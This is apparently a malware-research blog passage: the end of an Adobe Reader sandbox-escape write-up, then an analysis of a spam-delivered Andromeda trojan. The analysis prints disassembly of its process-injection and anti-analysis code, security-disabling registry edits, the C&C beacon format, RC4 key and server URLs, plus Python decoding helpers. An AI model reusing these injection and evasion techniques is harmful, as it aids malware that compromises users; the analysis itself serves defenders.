<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuaa8DqImABDbFEOX0npVVEVzlAzGGMCN6EKyw_l-Q5oNa3HNGGw9VNpc4zBihSnuZtkjSp8dOXbdxvGCoLYkTlpYLPj5k5BOlYVwH9RPEiUsGQmuLVVQqfKJR39knyyKcrHUhpm4Lbsl4/s1600/RegisterWindowsMesssageW.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuaa8DqImABDbFEOX0npVVEVzlAzGGMCN6EKyw_l-Q5oNa3HNGGw9VNpc4zBihSnuZtkjSp8dOXbdxvGCoLYkTlpYLPj5k5BOlYVwH9RPEiUsGQmuLVVQqfKJR39knyyKcrHUhpm4Lbsl4/s1600/RegisterWindowsMesssageW.jpg" height="143" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 16: RegisterWindowsMessageW Usage</td></tr>
</tbody></table>
Now the malicious PDF corrupts the broker process heap by calling GetClipboardFormatNameA with the size set to a large value.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbybMvgZL4_C7UYbL_8t2d6HmD4uzMhdNgxfuTf3uHGuch35LtuEd90mMQ49u4KsJ4AnvCAbXxkCYQqb8y2Pn983Y3Mt5SDz5GgHePcF8Fs5ZrGiPXeOhtkzPuEbxOmv4r7WHNVOI9kBr4/s1600/API_harvest_GetClipboardFormatNameA.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbybMvgZL4_C7UYbL_8t2d6HmD4uzMhdNgxfuTf3uHGuch35LtuEd90mMQ49u4KsJ4AnvCAbXxkCYQqb8y2Pn983Y3Mt5SDz5GgHePcF8Fs5ZrGiPXeOhtkzPuEbxOmv4r7WHNVOI9kBr4/s1600/API_harvest_GetClipboardFormatNameA.jpg" height="181" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 17: API Harvest - GetClipboardFormatNameA</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0sqmNiqGxCwYavJ0GunpJE78sOEdHQRNrKDmFYMaaMDO4YHsB1QLu0rhSdba0YEQJwtHJV6-eQLw5oMilNlklzY342bL7DtuQ5FiLiahqA2zT_Vv8TUQevQV5XMREf4y_vCsUZz4Z8bGG/s1600/GetClipBoardFormatA.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0sqmNiqGxCwYavJ0GunpJE78sOEdHQRNrKDmFYMaaMDO4YHsB1QLu0rhSdba0YEQJwtHJV6-eQLw5oMilNlklzY342bL7DtuQ5FiLiahqA2zT_Vv8TUQevQV5XMREf4y_vCsUZz4Z8bGG/s1600/GetClipBoardFormatA.jpg" height="150" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 18 : GetClipboardFormatNameA usage</td></tr>
</tbody></table>
Because of the size passed, the broker process calls GetClipboardFormatNameW instead.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK-otIlucVHWL_oZ4HRWKI4aZC553Ujggeq1XxahZDvQQO9ZCVHbgzPtTgR_HcVs3wdgJ9pAdEI_29TnPEC-f2GX2j-K5H-jMD66B8zcwSn66I-ZqP7mOmeVHQZQNyPF2yI_GA2u-QIMIU/s1600/GetClipBoardFormatW_Broker.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK-otIlucVHWL_oZ4HRWKI4aZC553Ujggeq1XxahZDvQQO9ZCVHbgzPtTgR_HcVs3wdgJ9pAdEI_29TnPEC-f2GX2j-K5H-jMD66B8zcwSn66I-ZqP7mOmeVHQZQNyPF2yI_GA2u-QIMIU/s1600/GetClipBoardFormatW_Broker.jpg" height="212" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 19: Heap Before GetClipboardFormatNameW in Broker Process</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMXEBYFWcTME-8dzmH0PmBUUyiRYadX64NPq8uT2R0Q4fLcAzLcRbGsNvpMAs2KMt-vZNtnVXnuac_JWjLrbBpwH1qOJB4vJ6BUbSwU3wCX6ezedMpCHTPrshx1w6huwmClZlRsdw9Eveu/s1600/GetClipBoardFormatW_Broker_After.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMXEBYFWcTME-8dzmH0PmBUUyiRYadX64NPq8uT2R0Q4fLcAzLcRbGsNvpMAs2KMt-vZNtnVXnuac_JWjLrbBpwH1qOJB4vJ6BUbSwU3wCX6ezedMpCHTPrshx1w6huwmClZlRsdw9Eveu/s1600/GetClipBoardFormatW_Broker_After.jpg" height="232" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 20: Heap Result after GetClipBoardFormatNameW in Broker Process</td></tr>
</tbody></table>
The corrupted IPC (inter-process communication) data is then accessed by abruptly returning to the renderer process.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbYdAwYvYLC48uif1zcQC_qGmG3leeADhJAX-MH-SqSmBoC64BvWIA5ui_5wSZpfembzsm4Za9mhtFQrX_vN5R3o_Z2O-bSs1knuP7tZO4SoByy81-USD6HfZO6uCO1W9DPw8Nu49GsumE/s1600/ForcebackToRenderer.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbYdAwYvYLC48uif1zcQC_qGmG3leeADhJAX-MH-SqSmBoC64BvWIA5ui_5wSZpfembzsm4Za9mhtFQrX_vN5R3o_Z2O-bSs1knuP7tZO4SoByy81-USD6HfZO6uCO1W9DPw8Nu49GsumE/s1600/ForcebackToRenderer.jpg" height="55" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 17: Force back to Renderer process</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnnn0zuYkhxP72e8jQdaROLwYy1n-5BUhhltviU_GFTZUPgF1RDZYGwY0aERY_AXpi7CqqJt7nt1T2YDBNhO0NZxKq3zHs0CbjbERwHRTpevrvrB79UfI3CMSgpldSyWSh2vHwnDj1iZ6F/s1600/SignalObjectAndWait.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnnn0zuYkhxP72e8jQdaROLwYy1n-5BUhhltviU_GFTZUPgF1RDZYGwY0aERY_AXpi7CqqJt7nt1T2YDBNhO0NZxKq3zHs0CbjbERwHRTpevrvrB79UfI3CMSgpldSyWSh2vHwnDj1iZ6F/s1600/SignalObjectAndWait.jpg" height="50" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 21: SignalObjectAndWait - The final touch</td></tr>
</tbody></table>
<br />
At this point, the broker process is now running the heap spray code.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqsSi3eC5ypQP0swzoeKmo77uCNwbJYtlFBHhRKf0Q1MZf687V2XvuBvOxYd2ML8Lt-BnlCVmmONWSNP7E49EQXrwOVavARlKz1gYn-PtIaJLHbZdPHeaTWzvGqkCp4v2wbM7evlEAP2B0/s1600/Precheck_Heapspray.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqsSi3eC5ypQP0swzoeKmo77uCNwbJYtlFBHhRKf0Q1MZf687V2XvuBvOxYd2ML8Lt-BnlCVmmONWSNP7E49EQXrwOVavARlKz1gYn-PtIaJLHbZdPHeaTWzvGqkCp4v2wbM7evlEAP2B0/s1600/Precheck_Heapspray.jpg" height="214" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 22 : Calling ROP</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2v5wKiyHpeYcsdeWerJ6tHvNDd2gjAhbAGvbk5czLG8mqwdzeG4g8qD2RxaGxTd-0F2MMyglJseJ-fZN97pJ-1BKGO4hschWr9xygIzISfPuGjjMahb2XwM5hVyjTDG8FbU6VcHyjkTgu/s1600/Jumping_to_Heapspray.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2v5wKiyHpeYcsdeWerJ6tHvNDd2gjAhbAGvbk5czLG8mqwdzeG4g8qD2RxaGxTd-0F2MMyglJseJ-fZN97pJ-1BKGO4hschWr9xygIzISfPuGjjMahb2XwM5hVyjTDG8FbU6VcHyjkTgu/s1600/Jumping_to_Heapspray.jpg" height="105" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 23: ROP back to shell code</td></tr>
</tbody></table>
The author suggests that users update to the latest Adobe Reader version so that they are not affected by this exploit.<br />
<br />Wren Fer Balangcod<br />
<br />
SPAM: Taxes, allowances and tax credits (2014-07-08)<br />
I received a new spam mail quite recently stating that I can claim a tax refund. What caught my attention is that it says I have a tax refund from the US even though in actuality I have never worked nor paid taxes in the US.<br />
Here is a screenshot of the spam mail.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GH8I1QlpeQmBSnrEq6ODpJtTzSbjUhOu5j5YTdaDe_-v89ldOmwgxJqbprNXMN6Qnvf_ZFqmAfAb8S4uMP-qRxF2JO9DBPO_akHg9dlQEfr79zEuwhDvSWMr0ksgkdGOtfJII80O/s1600/spam_mail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GH8I1QlpeQmBSnrEq6ODpJtTzSbjUhOu5j5YTdaDe_-v89ldOmwgxJqbprNXMN6Qnvf_ZFqmAfAb8S4uMP-qRxF2JO9DBPO_akHg9dlQEfr79zEuwhDvSWMr0ksgkdGOtfJII80O/s1600/spam_mail.png" height="271" width="320" /></a></div>
<br />
This mail has an archive file attached, “Refund-Form-ID_0842893.zip”, claiming to be a form that I need to complete and submit for issuance of the said tax refund.<br />
<br />
Inside the zip file is a malicious executable named “Tax_76483691535948579.elc.exe”, detected by ThreatTrack’s Vipre as Trojan.Win32.Zbot.qu (v) (but more commonly known by some as Andromeda).<br />
<br />
This malware is closely related to, or should I say an updated version of, the malware spam previously analyzed by my colleague in http://www.antimalwarelab.com/2014/05/spam-mail-from-fake-fedex.html.<br />
<br />
<h3>
ANTI-DEBUGGING</h3>
<br />
It enumerates running process names, hashes each one using ntdll.RtlComputeCrc32 and compares the result to a table of CRC32 hashes within its body. The previous version of this malware compared against hard-coded hashes directly; this version loops over a table and checks for each hash value listed in it.<br />
<br />
<blockquote class="tr_bq">
seg000:000011E8 call CreateToolhelp32Snapshot<br />
…<br />
…<br />
seg000:0000120B call Process32First<br />
…<br />
…<br />
seg000:0000121A _checkNextProc: ; CODE XREF: DebugCheck+B9j<br />
seg000:0000121A xor edi, edi<br />
seg000:0000121C cmp [ebp+var_210], bl<br />
seg000:00001222 jz short loc_124D<br />
seg000:00001224<br />
seg000:00001224 _convertToSmallCaps: ; CODE XREF: DebugCheck+75j<br />
seg000:00001224 lea esi, [ebp+edi+var_210]<br />
seg000:0000122B mov al, [esi]<br />
seg000:0000122D xor ecx, ecx<br />
seg000:0000122F cmp al, 5Ah ; 'Z'<br />
seg000:00001231 setle cl<br />
seg000:00001234 xor edx, edx<br />
seg000:00001236 cmp al, 41h ; 'A'<br />
seg000:00001238 setnl dl<br />
seg000:0000123B test edx, ecx<br />
seg000:0000123D jz short loc_1243<br />
seg000:0000123F add al, 20h ; ' '<br />
seg000:00001241 mov [esi], al<br />
seg000:00001243<br />
seg000:00001243 loc_1243: ; CODE XREF: DebugCheck+67j<br />
seg000:00001243 inc edi<br />
seg000:00001244 cmp [ebp+edi+var_210], bl<br />
seg000:0000124B jnz short _convertToSmallCaps<br />
seg000:0000124D<br />
seg000:0000124D loc_124D: ; CODE XREF: DebugCheck+4Cj<br />
seg000:0000124D push edi<br />
seg000:0000124E lea eax, [ebp+var_210]<br />
seg000:00001254 push eax ; # process name<br />
seg000:00001255 push ebx<br />
seg000:00001256 call RtlComputeCrc32<br />
seg000:0000125B mov ecx, ds:7FF90218h ; # hash table of process to check<br />
seg000:00001261 xor edx, edx<br />
seg000:00001263 jmp short loc_1271<br />
seg000:00001265 ; ---------------------------------------------------------------------------<br />
seg000:00001265<br />
seg000:00001265 _contHashCheck: ; CODE XREF: DebugCheck+9Dj<br />
seg000:00001265 cmp eax, ecx<br />
seg000:00001267 jz short _hashProcFound ; # hash matched<br />
seg000:00001269 mov ecx, ds:7FF9021Ch[edx*4]<br />
seg000:00001270 inc edx<br />
seg000:00001271<br />
seg000:00001271 loc_1271: ; CODE XREF: DebugCheck+8Dj<br />
seg000:00001271 cmp ecx, ebx<br />
seg000:00001273 jnz short _contHashCheck<br />
seg000:00001275 jmp short loc_127E</blockquote>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqvOl0duztk8EiSYQ0lbmW2mHFjpdHSzmKF-tjijgcRhEWTKU2AhMKKOi-ovEYvhagPgkCmz7tCLH-GGtydzz0dbOkWBdRPDXR79r1aUJAXndFA0getJ_uLgYJjHP6kA7MkmD8cd2B/s1600/crc32-hash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqvOl0duztk8EiSYQ0lbmW2mHFjpdHSzmKF-tjijgcRhEWTKU2AhMKKOi-ovEYvhagPgkCmz7tCLH-GGtydzz0dbOkWBdRPDXR79r1aUJAXndFA0getJ_uLgYJjHP6kA7MkmD8cd2B/s1600/crc32-hash.png" height="97" width="320" /></a></div>
<div style="text-align: center;">
<i>CRC32-hash table of processes to avoid</i></div>
<br />
These are some of the hashes whose names were recovered by trial and error. As we know, recovering a string from a computed hash is nearly impossible. These strings are the file names/process names of common monitoring and analysis tools.<br />
wireshark.exe – 0x77AE10F7<br />
vboxservice.exe – 0x64340DCE<br />
vboxtray.exe – 0x63C54474<br />
vmtoolsd.exe – 0x278CDF58<br />
vmwareuser.exe – 0x99DD4432<br />
procmon.exe – 0x5BA9B1FE<br />
filemon.exe – 0x3D46F02B<br />
regmon.exe – 0x3CE2BEF3<br />
netmon.exe – 0xF344E95D<br />
<br />
It may also check the CRC32 hash of the drive name where the Windows directory is located and compare it to 0x20C7DD84 before it continues.<br />
<br />
It checks for sbiedll.dll, which is used by Sandboxie (sandbox security software for Windows).<br />
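To verify the recovered names, and to test further candidates against the table, the following added example (not the malware's code) re-implements the check as the listing above shows it: the ASCII-only lowercase loop followed by RtlComputeCrc32 with an initial value of 0, which is the standard CRC-32 that zlib computes. The candidate spellings tried against the drive-name hash are guesses, since the post does not say which form the sample hashes.

```python
"""Reproduce the Andromeda-style CRC32 process-name blacklist check.

Added example, not the malware's code.  The sample lowercases the process
name byte by byte (only 'A'..'Z' get 0x20 added, exactly like the
_convertToSmallCaps loop) and then calls ntdll.RtlComputeCrc32(0, name, len).
RtlComputeCrc32 with an initial value of 0 is the standard CRC-32, so
zlib.crc32 reproduces the table and lets an analyst confirm recovered names
or try new candidates.
"""
import zlib
from typing import Dict, Iterable, Optional

# Hash table as listed in the post (names recovered by the post's author).
BLACKLIST: Dict[int, str] = {
    0x77AE10F7: "wireshark.exe",
    0x64340DCE: "vboxservice.exe",
    0x63C54474: "vboxtray.exe",
    0x278CDF58: "vmtoolsd.exe",
    0x99DD4432: "vmwareuser.exe",
    0x5BA9B1FE: "procmon.exe",
    0x3D46F02B: "filemon.exe",
    0x3CE2BEF3: "regmon.exe",
    0xF344E95D: "netmon.exe",
}

# Hash the post says may be compared against the Windows drive name.
DRIVE_HASH = 0x20C7DD84


def malware_lower(name: bytes) -> bytes:
    """Mirror the sample's ASCII-only lowercase loop: 'A'..'Z' -> +0x20."""
    return bytes(b + 0x20 if 0x41 <= b <= 0x5A else b for b in name)


def name_hash(name: bytes) -> int:
    """CRC-32 of the lowercased name, as RtlComputeCrc32(0, buf, len)."""
    return zlib.crc32(malware_lower(name)) & 0xFFFFFFFF


def is_blacklisted(process_name: str) -> bool:
    """True if this process name would make the sample bail out."""
    return name_hash(process_name.encode("ascii", "replace")) in BLACKLIST


def recover_names(target_hashes: Iterable[int],
                  candidates: Iterable[str]) -> Dict[int, Optional[str]]:
    """Trial-and-error recovery: map each target hash to a matching candidate.

    This is the approach the post describes; a hash with no matching
    candidate stays None.
    """
    wanted = set(target_hashes)
    found: Dict[int, Optional[str]] = {h: None for h in wanted}
    for cand in candidates:
        h = name_hash(cand.encode("ascii", "replace"))
        if h in wanted and found[h] is None:
            found[h] = cand
    return found


if __name__ == "__main__":
    # Constructed process list, as a defender-side sandbox might see it.
    running = ["explorer.exe", "WireShark.EXE", "notepad.exe", "VBoxTray.exe"]
    for p in running:
        print(f"{p:16s} crc32=0x{name_hash(p.encode()):08X} "
              f"blacklisted={is_blacklisted(p)}")

    # Re-derive the table from the recovered names to confirm the method.
    for h, n in recover_names(BLACKLIST, BLACKLIST.values()).items():
        print(f"0x{h:08X} -> {n}")

    # Drive-name hash: these candidate spellings are guesses (hypothetical);
    # the post does not say which form the sample hashes.
    print(recover_names([DRIVE_HASH], ["C:", "C:\\", "c:", "c:\\"]))
```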
<br />
<h3>
SYSTEM CHANGES</h3>
<br />
It adds the following registry entries in an attempt to avoid raising suspicion.<br />
<blockquote class="tr_bq">
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer   TaskbarNoNotification = dword:00000000<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer   HideSCAHealth = dword:00000000<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System   EnableLUA = dword:00000000<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer   TaskbarNoNotification = dword:00000000<br />
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer   HideSCAHealth = dword:00000000</blockquote>
<br />
It also deletes the autorun registry key of taskmgr.exe located under “Image File Execution Options”, if present:<br />
<blockquote class="tr_bq">
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\image file execution options\taskmgr.exe</blockquote>
<br />
It will also disable some Windows security services, such as:<br />
wscsvc – Windows Security Center service<br />
WinDefend – Windows Defender service<br />
MpsSvc – part of the Windows Firewall service<br />
SharedAccess – Internet Connection Sharing service<br />
wuauserv – Windows Update service<br />
<br />
It then proceeds to delete its main executable in an attempt to clean up its traces.<br />
<br />
<br />
<h3>
PAYLOAD</h3>
<br />
It first checks whether the operating system is 32-bit or 64-bit Windows and injects its code into the corresponding msiexec.exe:<br />
%windir%\SysWOW64\msiexec.exe (for 64-bit)<br />
%windir%\system32\msiexec.exe (for 32-bit)<br />
<br />
It uses two code injection techniques, so that if the first one fails it still has a backup routine.<br />
<br />
The first is the conventional way of injecting code into a target process (msiexec.exe): CreateProcess, NtMapViewOfSection, overwrite the entry point of the target process so that it points to the malware code, then ResumeThread.<br />
<blockquote class="tr_bq">
seg000:00002561 call dword ptr ds:7FF900F8h ; # CreateProcessW<br />
…<br />
…<br />
seg000:0000259E call NtMapViewOfSection<br />
seg000:000025A3 test eax, eax<br />
seg000:000025A5 jnz loc_262D<br />
seg000:000025AB mov esi, [ebp+var_34]<br />
seg000:000025AE mov eax, [ebp+arg_4]<br />
seg000:000025B1 mov ecx, [ebp+var_4]<br />
seg000:000025B4 add edi, esi<br />
seg000:000025B6 push edi<br />
seg000:000025B7 add ecx, eax<br />
seg000:000025B9 push 6<br />
seg000:000025BB lea eax, [ebp-3Ch] ; # overwrite entry point of msiexec.exe with<br />
seg000:000025BB ; # 68 BF160A00 PUSH 0A16BF<br />
seg000:000025BB ; # C3 RETN<br />
seg000:000025BE push eax<br />
seg000:000025BF mov [ebp+var_3B], ecx<br />
seg000:000025C2 call MemCopy<br />
…<br />
…<br />
seg000:000025F1 call NtUnmapViewOfSection<br />
…<br />
…<br />
seg000:00002639 push [ebp+var_20]<br />
seg000:0000263C call dword ptr ds:7FF90120h ; # ResumeThread</blockquote>
<br />
The other is the same procedure as above, but it calls QueueUserAPC before ResumeThread. The malware queues an APC with QueueUserAPC before the thread begins to run (in this case the thread of msiexec.exe). The queued APC function points to the malware code already copied into the address space of msiexec.exe, so when the suspended thread is resumed the APC function is called first, and the malware code executes.<br />
<blockquote class="tr_bq">
…<br />
…<br />
seg000:00002745 mov eax, [ebp+arg_4]<br />
seg000:00002748 mov ecx, [ebp+var_4]<br />
seg000:0000274B push [ebp+var_1C]<br />
seg000:0000274E add ecx, eax<br />
seg000:00002750 push ecx<br />
seg000:00002751 call dword ptr ds:7FF90128h ; # QueueUserAPC<br />
seg000:00002757 push [ebp+var_1C]<br />
seg000:0000275A mov [ebp+var_8], eax<br />
seg000:0000275D call dword ptr ds:7FF90120h ; # ResumeThread</blockquote>
<br />
It also hooks ntdll.NtOpenSection and GetAddrInfoW so that they point to its own code.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm9g0XcZBdC6lwyDSMWC9fEMm5pWFgqjn_91r9J6Hr4tQJHsHra1eY5-XJWnHyh7CXxyxDZw0P9KoOZKHCI2iNASEc7AEStYTX3BsWPpy7lw-7K3DGjr0JUDm6_lgTaEKPh1H8AK0t/s1600/dll+hook.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm9g0XcZBdC6lwyDSMWC9fEMm5pWFgqjn_91r9J6Hr4tQJHsHra1eY5-XJWnHyh7CXxyxDZw0P9KoOZKHCI2iNASEc7AEStYTX3BsWPpy7lw-7K3DGjr0JUDm6_lgTaEKPh1H8AK0t/s1600/dll+hook.png" height="113" width="320" /></a></div>
<br />
It checks for internet connectivity by querying common DNS names such as:<br />
update.microsoft.com<br />
microsoft.com<br />
bing.com<br />
google.com<br />
yahoo.com<br />
<br />
It then crafts a message with the following format before sending it to its C&amp;C server:<br />
“id:%lu|bid:%lu|os:%lu|la:%lu|rg:%lu”<br />
where:<br />
id = volume information of the infected drive<br />
bid = bot ID version<br />
os = operating system version (whether 32- or 64-bit)<br />
la = IP address of the infected host<br />
rg = whether it runs with administrative privileges (1 or 0)<br />
<br />
Here is an example of the data string to be sent to the C&amp;C:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqq0D51y41M90eFYWbMR8RBjGBIjfhGa5Y0yPVnJDg-sPz3VZoppzHixzIB7hEoEfnSm0gZndHwtPKTJeu1_j6tdI-lxBxTrW55gfn3LlElG55N1us0CXauoz78CyIV8dkCsskndgX/s1600/enc_datastring.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqq0D51y41M90eFYWbMR8RBjGBIjfhGa5Y0yPVnJDg-sPz3VZoppzHixzIB7hEoEfnSm0gZndHwtPKTJeu1_j6tdI-lxBxTrW55gfn3LlElG55N1us0CXauoz78CyIV8dkCsskndgX/s1600/enc_datastring.png" height="30" width="320" /></a></div>
id:2894982272|bid:34|os:593|la:3232258948|rg:1<br />
<br />
The string is encrypted with RC4 using the key b8d4b5527da0f28c47cd82d86557d4dc and then Base64-encoded.<br />
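The following added example (not the malware's code) re-implements that wrapping in pure Python so a captured beacon can be unwrapped and parsed offline, and wraps the sample string from the post to show the round trip. It assumes the RC4 key is used as the literal ASCII string quoted above and that the la field is a host-order IPv4 address; neither assumption is stated on the page.

```python
"""Wrap and unwrap an Andromeda-style C&C beacon.

Added example, not the malware's code.  The post gives the plaintext
format "id:%lu|bid:%lu|os:%lu|la:%lu|rg:%lu", the RC4 key and the Base64
step; everything below re-implements that so a captured beacon can be
decoded offline.  Assumptions (not facts from the post): the RC4 key is
the literal ASCII string shown, and "la" is a host-order IPv4 address.
"""
import base64
import ipaddress
from typing import Dict

RC4_KEY = b"b8d4b5527da0f28c47cd82d86557d4dc"  # key as printed in the post
FIELDS = ("id", "bid", "os", "la", "rg")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same op."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_beacon(fields: Dict[str, int]) -> str:
    """Format, RC4-encrypt and Base64-encode, in the order the post describes."""
    plain = "|".join(f"{k}:{fields[k]}" for k in FIELDS).encode("ascii")
    return base64.b64encode(rc4(RC4_KEY, plain)).decode("ascii")


def unwrap_beacon(blob: str) -> Dict[str, int]:
    """Reverse the wrapping and parse the five %lu fields strictly."""
    plain = rc4(RC4_KEY, base64.b64decode(blob)).decode("ascii")
    parsed: Dict[str, int] = {}
    for part in plain.split("|"):
        k, _, v = part.partition(":")
        if k not in FIELDS or not v.isdigit():
            raise ValueError(f"unexpected field {part!r}")
        parsed[k] = int(v)
    if set(parsed) != set(FIELDS):
        raise ValueError("beacon is missing fields")
    return parsed


def describe(fields: Dict[str, int]) -> Dict[str, str]:
    """Analyst-friendly view; the IPv4 rendering assumes host byte order."""
    return {
        "volume_serial": f"0x{fields['id']:08X}",
        "bot_id": str(fields["bid"]),
        "os": str(fields["os"]),
        "local_ip": str(ipaddress.IPv4Address(fields["la"])),
        "is_admin": "yes" if fields["rg"] == 1 else "no",
    }


if __name__ == "__main__":
    # The example string from the post, split into its fields.
    sample = {"id": 2894982272, "bid": 34, "os": 593, "la": 3232258948, "rg": 1}
    wrapped = build_beacon(sample)
    print("wrapped:  ", wrapped)
    print("unwrapped:", unwrap_beacon(wrapped))
    print("decoded:  ", describe(unwrap_beacon(wrapped)))
```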
<br />
Here is the final encrypted equivalent of the same string<br />
<br />
<br />
It uses the Google Public DNS servers (8.8.8.8 &amp; 8.8.8.4) to resolve its C&amp;C servers, listed below:<br />
http://62.76.40.177/srt/ge.php<br />
http://37.139.47.108/srt/ge.php<br />
<br />
As of this writing, the servers listed above are already inactive. However, variants of this malware family suggest that it downloads the well-known Zeus bot (Zbot) malware.<br />
<br />
It may also download additional malware functionalities or plugins as DLLs with the export functions “aReport” &amp; “aUpdate”. Since the links are dead and I haven’t obtained any additional downloaded files, I can only assume that the “aReport” function sends some info to its C&amp;C server while the “aUpdate” function checks for an updated version of the malware.<br />
<br />
Below is a code snippet showing how it attempts to call the aReport function: it traverses the DLL modules loaded in memory looking for its DLL component (supposedly already loaded), uses GetProcAddress to get the address of aReport, and then calls it. The same procedure is done for aUpdate.<br />
<blockquote class="tr_bq">
seg000:00000CFC call CreateToolhelp32Snapshot<br />
seg000:00000D01 mov [ebp+var_4], eax<br />
seg000:00000D04 cmp eax, 0FFFFFFFFh<br />
seg000:00000D07 jz loc_D93<br />
seg000:00000D0D lea eax, [ebp+var_228]<br />
seg000:00000D13 push eax<br />
seg000:00000D14 push [ebp+var_4]<br />
seg000:00000D17 mov [ebp+var_228], 224h<br />
seg000:00000D21 call Module32First<br />
seg000:00000D26 test eax, eax<br />
seg000:00000D28 jz short loc_D8A<br />
seg000:00000D2A push ebx<br />
seg000:00000D2B push esi<br />
seg000:00000D2C<br />
seg000:00000D2C _loopProc: ; CODE XREF: sub_CDD+A9j<br />
